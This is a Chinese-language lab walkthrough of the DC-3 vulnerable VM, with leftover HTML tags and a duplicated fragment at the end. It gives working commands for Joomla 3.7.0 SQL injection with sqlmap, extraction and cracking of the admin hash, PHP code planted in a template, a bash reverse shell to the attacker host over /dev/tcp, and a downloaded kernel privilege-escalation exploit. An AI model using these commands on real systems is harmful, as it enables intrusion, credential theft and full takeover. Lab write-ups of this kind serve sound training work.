DC-3-2靶机渗透测试教学文档<\/h1>

靶机环境配置<\/h2>

虚拟机设置问题<\/strong>：

启动靶机时可能遇到问题，需要在CD\/DVD设置中将高级选项里的IDE改为0:0<\/li> <\/ul> <\/li> <\/ol>
信息收集阶段<\/h2>
1. 扫描主机IP<\/h3>
arp-scan -l <\/span><\/span><\/code><\/pre>2. 端口扫描<\/h3> nmap 192.168.130.151 <\/span><\/span><\/code><\/pre> 发现只开放了80端口<\/li> <\/ul> 3. 目录扫描<\/h3> dirsearch -u 192.168.130.151 -i,200 <\/span><\/span><\/code><\/pre> 发现重要文件\/目录： \/robots.txt.dist<\/li> \/administrator\/<\/li> <\/ul> <\/li> <\/ul> 4. 检查robots文件<\/h3> 访问：http:\/\/192.168.130.151\/robots.txt.dist<\/code><\/p> 5. 检查后台登录页面<\/h3> 访问：http:\/\/192.168.130.151\/administrator\/<\/code><\/p> 发现是Joomla CMS的后台登录页面<\/li> <\/ul> 6. 初步SQL注入测试<\/h3> sqlmap -u http:\/\/192.168.130.151\/administrator\/index.php --data=<\/span>"username=1&passwd=1"<\/span> --batch <\/span><\/span><\/code><\/pre> 未发现注入点<\/li> <\/ul> 7. Joomla版本识别<\/h3> apt install joomscan <\/span><\/span>joomscan -u 192.168.130.151 <\/span><\/span><\/code><\/pre> 识别出版本为Joomla 3.7.0<\/li> <\/ul> 8. 查找已知漏洞<\/h3> searchsploit joomla 3.7.0 <\/span><\/span><\/code><\/pre> 发现可利用的SQL注入漏洞(42033.txt)<\/li> <\/ul> SQL注入攻击<\/h2> 1. 下载漏洞利用说明<\/h3> searchsploit -m 42033.txt <\/span><\/span>cat 42033.txt <\/span><\/span><\/code><\/pre>2. 利用SQL注入获取数据库信息<\/h3> sqlmap -u "http:\/\/192.168.130.151\/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml"<\/span> --risk=<\/span>3<\/span> --level=<\/span>5<\/span> --random-agent --dbs -p list[<\/span>fullordering]<\/span> <\/span><\/span><\/code><\/pre> 发现数据库：joomladb<\/li> <\/ul> 3. 获取表信息<\/h3> sqlmap -u "http:\/\/192.168.130.151\/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml"<\/span> --risk=<\/span>3<\/span> --level=<\/span>5<\/span> --random-agent --dbs -p list[<\/span>fullordering]<\/span> --batch -D joomladb -tables <\/span><\/span><\/code><\/pre> 发现users表<\/li> <\/ul> 4. 获取列信息（注意两种不同语法）<\/h3> # 第一种语法（可能失败）<\/span> <\/span><\/span>sqlmap -u "http:\/\/192.168.130.151\/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml"<\/span> --risk=<\/span>3<\/span> --batch -p list[<\/span>fullordering]<\/span> -D "joomladb"<\/span> -T "#__users"<\/span> --columns <\/span><\/span> <\/span><\/span># 第二种语法（成功）<\/span> <\/span><\/span>sqlmap -u "http:\/\/192.168.130.151\/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml"<\/span> --risk=<\/span>3<\/span> -p list[<\/span>fullordering]<\/span> -D "joomladb"<\/span> --tables -T "#__users"<\/span> --columns <\/span><\/span><\/code><\/pre>5. 导出用户名和密码哈希<\/h3> sqlmap -u "http:\/\/192.168.130.151\/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml"<\/span> --risk=<\/span>3<\/span> -p list[<\/span>fullordering]<\/span> -D "joomladb"<\/span> --tables -T "#__users"<\/span> -C "username,password"<\/span> --dump <\/span><\/span><\/code><\/pre> 获取admin的密码哈希：$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu<\/code><\/li> <\/ul> 6. 破解密码哈希<\/h3> 使用John the Ripper破解：<\/p> john --format=<\/span>bcrypt hash.txt <\/span><\/span><\/code><\/pre> 破解出密码：snoopy<\/li> <\/ul> 后台访问与Getshell<\/h2> 1. 登录后台<\/h3> 使用admin\/snoopy登录http:\/\/192.168.130.151\/administrator\/<\/code><\/p> 2. 模板编辑漏洞利用<\/h3> 在模板编辑功能中插入PHP代码：<\/li> <\/ul> <?<\/span>php<\/span> phpinfo<\/span>(); ?><\/span> <\/span><\/span><\/span><\/code><\/pre>3. 确定模板文件路径<\/h3> 尝试路径：<\/p> \/administrator\/templates\/<\/code> - 内容不符<\/li> \/templates\/beez3\/<\/code> - 无报错，确认存在<\/li> <\/ul> 4. 验证PHP执行<\/h3> 访问：http:\/\/192.168.130.151\/templates\/beez3\/jsstrings.php<\/code><\/p> 确认PHP代码执行成功<\/li> <\/ul> 5. 上传反弹Shell<\/h3> 修改jsstrings.php文件内容为：<\/p> <?<\/span>php<\/span> exec<\/span>("\/bin\/bash -c 'bash -i >& \/dev\/tcp\/192.168.130.128\/8888 0>&1'"<\/span>); ?><\/span> <\/span><\/span><\/span><\/code><\/pre>6. 设置监听<\/h3> nc -lvnp 8888<\/span> <\/span><\/span><\/code><\/pre> 访问jsstrings.php页面获取Shell<\/li> <\/ul> 权限提升<\/h2> 1. 系统信息收集<\/h3> uname -a <\/span><\/span>lsb_release -a <\/span><\/span><\/code><\/pre> 内核版本：Linux 4.4.x<\/li> 发行版本：Ubuntu 16.04<\/li> <\/ul> 2. 查找内核漏洞<\/h3> searchsploit ubuntu 16.04 <\/span><\/span><\/code><\/pre> 发现可用漏洞：Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation (39772.txt)<\/li> <\/ul> 3. 下载漏洞利用代码<\/h3> searchsploit -m 39772.txt <\/span><\/span>cat 39772.txt <\/span><\/span><\/code><\/pre> 获取脚本下载地址：https:\/\/gitlab.com\/exploit-database\/exploitdb-bin-sploits\/-\/raw\/main\/bin-sploits\/39772.zip<\/li> <\/ul> 4. 上传漏洞利用代码到靶机<\/h3> 两种方法：<\/p> 方法一<\/strong>：<\/p> 在Kali上下载到指定目录：<\/li> <\/ul> wget https:\/\/gitlab.com\/exploit-database\/exploitdb-bin-sploits\/-\/raw\/main\/bin-sploits\/39772.zip -O "\/home\/zh1yu\/39772.zip"<\/span> <\/span><\/span><\/code><\/pre> 启动Python简易HTTP服务器：<\/li> <\/ul> python2 -m SimpleHTTPServer 9999<\/span> <\/span><\/span><\/code><\/pre> 在靶机上下载：<\/li> <\/ul> wget http:\/\/192.168.130.128:9999\/39772.zip -O \/var\/www\/html\/templates\/beez3\/39772.zip <\/span><\/span><\/code><\/pre><\/li> 方法二<\/strong>（直接下载）：<\/p> wget https:\/\/gitlab.com\/exploit-database\/exploitdb-bin-sploits\/-\/raw\/main\/bin-sploits\/39772.zip -O \/var\/www\/html\/templates\/beez3\/39772.zip <\/span><\/span><\/code><\/pre><\/li> <\/ol> 5. 执行提权操作<\/h3> cd \/var\/www\/html\/templates\/beez3 <\/span><\/span>unzip 39772.zip <\/span><\/span>cd 39772<\/span> <\/span><\/span>tar -xvf exploit.tar <\/span><\/span>cd ebpf_mapfd_doubleput_exploit <\/span><\/span>.\/compile.sh <\/span><\/span>.\/doubleput <\/span><\/span><\/code><\/pre> 成功提权<\/li> <\/ul> 6. 查找flag<\/h3> cd ~ <\/span><\/span>cat the-flag.txt <\/span><\/span><\/code><\/pre>技术要点总结<\/h2> 脚本执行路径说明<\/strong>：<\/p> compile.sh<\/code>：Shell会按照PATH环境变量定义的目录顺序搜索可执行文件<\/li> .\/compile.sh<\/code>：显式指定当前目录，完全绕过PATH搜索<\/li> <\/ul> <\/li> PATH不包含当前目录的原因<\/strong>：<\/p> 安全考虑，防止恶意程序劫持命令（如当前目录下的恶意ls覆盖系统命令）<\/li> <\/ul> <\/li> 关键路径<\/strong>：<\/p> Joomla模板路径：\/var\/www\/html\/templates\/beez3\/<\/code><\/li> 提权脚本必须放在web可写目录执行<\/li> <\/ul> <\/li> <\/ol>

DC-3-2靶机渗透测试教学文档<\/h1>

信息收集阶段<\/h2>

4. 检查robots文件<\/h3>
访问：`http:\/\/192.168.130.151\/robots.txt.dist<\/code><\/p>`

SQL注入攻击<\/h2>

后台访问与Getshell<\/h2>

1. 登录后台<\/h3>
使用admin\/snoopy登录`http:\/\/192.168.130.151\/administrator\/<\/code><\/p>`

权限提升<\/h2>